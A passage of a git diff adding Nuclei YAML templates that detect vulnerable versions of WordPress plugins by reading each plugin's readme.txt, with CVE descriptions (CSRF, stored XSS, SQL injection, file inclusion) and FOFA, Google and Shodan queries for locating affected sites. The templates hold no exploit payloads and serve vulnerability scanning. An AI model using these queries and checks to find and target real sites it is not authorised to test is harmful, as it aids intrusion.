+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/donate-me/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "donate-me"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml b/poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml
new file mode 100644
index 0000000000..830d548b9e
--- /dev/null
+++ b/poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53777-4cd0625e0e16873871e20b7b67514246
+
+info:
+ name: >
+ Simple Header and Footer <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Simple Header and Footer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b253378-beba-4e31-bf1f-0352fdf98ab5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53777
+ metadata:
+ fofa-query: "wp-content/plugins/simple-header-and-footer/"
+ google-query: inurl:"/wp-content/plugins/simple-header-and-footer/"
+ shodan-query: 'vuln:CVE-2024-53777'
+ tags: cve,wordpress,wp-plugin,simple-header-and-footer,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-header-and-footer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-header-and-footer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml b/poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml
new file mode 100644
index 0000000000..6db825c1e4
--- /dev/null
+++ b/poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53778-f21730b86a71afb64088be9a871cf272
+
+info:
+ name: >
+ Essential Breadcrumbs <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4838b8-7a9d-43b7-a577-7d7ae8bac5fa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53778
+ metadata:
+ fofa-query: "wp-content/plugins/essential-breadcrumbs/"
+ google-query: inurl:"/wp-content/plugins/essential-breadcrumbs/"
+ shodan-query: 'vuln:CVE-2024-53778'
+ tags: cve,wordpress,wp-plugin,essential-breadcrumbs,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/essential-breadcrumbs/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "essential-breadcrumbs"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml b/poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml
new file mode 100644
index 0000000000..56ca0bcce8
--- /dev/null
+++ b/poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a
+
+info:
+ name: >
+ Yahoo! WebPlayer <= 2.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Yahoo! WebPlayer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e043348-c0aa-418f-9120-dcf470f92123?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53779
+ metadata:
+ fofa-query: "wp-content/plugins/yahoo-media-player/"
+ google-query: inurl:"/wp-content/plugins/yahoo-media-player/"
+ shodan-query: 'vuln:CVE-2024-53779'
+ tags: cve,wordpress,wp-plugin,yahoo-media-player,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/yahoo-media-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "yahoo-media-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml b/poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml
new file mode 100644
index 0000000000..0affd678fa
--- /dev/null
+++ b/poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb
+
+info:
+ name: >
+ Load More Posts <= 1.4.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Load More Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e45dd9f6-9cc6-42d0-b03f-65fda85425f2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53780
+ metadata:
+ fofa-query: "wp-content/plugins/load-more-posts/"
+ google-query: inurl:"/wp-content/plugins/load-more-posts/"
+ shodan-query: 'vuln:CVE-2024-53780'
+ tags: cve,wordpress,wp-plugin,load-more-posts,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/load-more-posts/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "load-more-posts"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml b/poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml
new file mode 100644
index 0000000000..5067667c93
--- /dev/null
+++ b/poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6
+
+info:
+ name: >
+ SpatialMatch IDX <= 3.0.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f406c82-14e7-468b-8bba-400aefe687b5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53781
+ metadata:
+ fofa-query: "wp-content/plugins/spatialmatch-free-lifestyle-search/"
+ google-query: inurl:"/wp-content/plugins/spatialmatch-free-lifestyle-search/"
+ shodan-query: 'vuln:CVE-2024-53781'
+ tags: cve,wordpress,wp-plugin,spatialmatch-free-lifestyle-search,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/spatialmatch-free-lifestyle-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "spatialmatch-free-lifestyle-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml b/poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml
new file mode 100644
index 0000000000..b05390e76a
--- /dev/null
+++ b/poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759
+
+info:
+ name: >
+ Photo Video Store <= 21.07 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 21.07. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/202c22f1-48ce-4724-be5f-dece2a6f9adb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53782
+ metadata:
+ fofa-query: "wp-content/plugins/photo-video-store/"
+ google-query: inurl:"/wp-content/plugins/photo-video-store/"
+ shodan-query: 'vuln:CVE-2024-53782'
+ tags: cve,wordpress,wp-plugin,photo-video-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/photo-video-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "photo-video-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 21.07')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml b/poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml
new file mode 100644
index 0000000000..de38bf426d
--- /dev/null
+++ b/poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51
+
+info:
+ name: >
+ Ni WooCommerce Cost Of Goods <= 3.2.8 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Ni WooCommerce Cost Of Goods plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.2.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/68846ab2-684c-40ad-8a91-0b7d9de1ecde?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.9
+ cve-id: CVE-2024-53783
+ metadata:
+ fofa-query: "wp-content/plugins/ni-woocommerce-cost-of-goods/"
+ google-query: inurl:"/wp-content/plugins/ni-woocommerce-cost-of-goods/"
+ shodan-query: 'vuln:CVE-2024-53783'
+ tags: cve,wordpress,wp-plugin,ni-woocommerce-cost-of-goods,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ni-woocommerce-cost-of-goods/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ni-woocommerce-cost-of-goods"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml b/poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml
new file mode 100644
index 0000000000..e43be52456
--- /dev/null
+++ b/poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684
+
+info:
+ name: >
+ Smart Marketing SMS and Newsletters Forms <= 5.0.9 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Smart Marketing SMS and Newsletters Forms plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 5.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6125a734-c185-4a97-a4fe-a739aa20de13?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53784
+ metadata:
+ fofa-query: "wp-content/plugins/smart-marketing-for-wp/"
+ google-query: inurl:"/wp-content/plugins/smart-marketing-for-wp/"
+ shodan-query: 'vuln:CVE-2024-53784'
+ tags: cve,wordpress,wp-plugin,smart-marketing-for-wp,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-marketing-for-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-marketing-for-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml b/poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml
new file mode 100644
index 0000000000..575b74a2ff
--- /dev/null
+++ b/poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207
+
+info:
+ name: >
+ Chatter <= 1.0.1 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Chatter plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2c6349-9444-4cea-90ae-f396ae92f85a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53785
+ metadata:
+ fofa-query: "wp-content/plugins/chatter/"
+ google-query: inurl:"/wp-content/plugins/chatter/"
+ shodan-query: 'vuln:CVE-2024-53785'
+ tags: cve,wordpress,wp-plugin,chatter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/chatter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "chatter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml b/poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
new file mode 100644
index 0000000000..a82e876f3e
--- /dev/null
+++ b/poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0
+
+info:
+ name: >
+ Cowidgets – Elementor Addons <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Cowidgets – Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a29ebdcb-3b03-4504-b553-6f7633c68f3f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53786
+ metadata:
+ fofa-query: "wp-content/plugins/cowidgets-elementor-addons/"
+ google-query: inurl:"/wp-content/plugins/cowidgets-elementor-addons/"
+ shodan-query: 'vuln:CVE-2024-53786'
+ tags: cve,wordpress,wp-plugin,cowidgets-elementor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cowidgets-elementor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cowidgets-elementor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml b/poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml
new file mode 100644
index 0000000000..7dfe946aaa
--- /dev/null
+++ b/poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a
+
+info:
+ name: >
+ Random Banner <= 4.2.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Random Banner plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/32369351-ddae-452f-b286-6478deab5a97?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53787
+ metadata:
+ fofa-query: "wp-content/plugins/random-banner/"
+ google-query: inurl:"/wp-content/plugins/random-banner/"
+ shodan-query: 'vuln:CVE-2024-53787'
+ tags: cve,wordpress,wp-plugin,random-banner,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/random-banner/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "random-banner"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml b/poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml
new file mode 100644
index 0000000000..46e063cd99
--- /dev/null
+++ b/poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3
+
+info:
+ name: >
+ WordPress Portfolio Builder – Portfolio Gallery <= 1.1.7 - Authenticated (Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WordPress Portfolio Builder – Portfolio Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25626f3-d9a9-4aad-8f5f-45f72d0711e1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-53788
+ metadata:
+ fofa-query: "wp-content/plugins/uber-grid/"
+ google-query: inurl:"/wp-content/plugins/uber-grid/"
+ shodan-query: 'vuln:CVE-2024-53788'
+ tags: cve,wordpress,wp-plugin,uber-grid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/uber-grid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "uber-grid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml b/poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml
new file mode 100644
index 0000000000..55c696af83
--- /dev/null
+++ b/poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118
+
+info:
+ name: >
+ Advanced What should we write next about <= 1.0.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Advanced What should we write next about plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9b09f4de-f67d-4d15-a3e3-0cc78cfe7fe8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53789
+ metadata:
+ fofa-query: "wp-content/plugins/advanced-what-should-we-write-about-next/"
+ google-query: inurl:"/wp-content/plugins/advanced-what-should-we-write-about-next/"
+ shodan-query: 'vuln:CVE-2024-53789'
+ tags: cve,wordpress,wp-plugin,advanced-what-should-we-write-about-next,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/advanced-what-should-we-write-about-next/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "advanced-what-should-we-write-about-next"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml b/poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
new file mode 100644
index 0000000000..a93a6d8a8b
--- /dev/null
+++ b/poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Lenxel Core plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
